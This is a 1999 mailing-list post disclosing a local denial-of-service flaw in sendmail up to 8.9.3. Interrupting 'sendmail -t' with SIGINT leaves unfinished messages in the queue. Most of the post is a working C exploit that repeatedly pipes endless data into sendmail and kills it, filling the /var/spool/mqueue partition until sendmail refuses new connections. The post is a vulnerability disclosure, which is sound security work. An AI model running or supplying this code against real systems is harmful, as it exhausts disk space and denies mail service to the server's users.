Date: Thu, 1 Apr 1999 14:00:16 +0000
From: Lukasz Luzar <[email protected]>
To: [email protected]Subject: Possible local DoS in sendmail
Hi,
It seems that sendmail ran with -t option does NOT block SIGINT ...
In that moment while we are sending data to its stdin, when we will press
CTRL-C process is being killed, but in queue rests unfinished letter.
It stays there quite long - long enought to fullfill partition on disk where
/var/spool/mqueue resides.
When it happends, sendmail doesn't allow new connections - so it is a kind
of DoS attack for this service.
It has been tested on all new versions on sendmail up to current (8.9.3).
Example ...
--- CUT HERE ----
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <sys/wait.h>
#define DELAY 5 /* time in seconds needed to reach
MaxMessageSize limit */
#define SM_PATH "/usr/sbin/sendmail -t"
void main()
{
FILE *fd;
int pid;
for(;;) {
if(( pid = fork()) == 0) {
setpgrp();
if(( fd = popen( SM_PATH, "w")) == NULL)
fprintf( stderr, "popen error\n");
for(;;) fputc( 'A', fd);
} else {
sleep( DELAY);
kill( (-1) * pid, SIGINT);
fprintf( stdout, "next\n");
wait( NULL);
}
}
}
--- CUT HERE ---
Regards,
---
Lukasz Luzar K.K.I.
http://noname.kki.krakow.pl/[email protected]
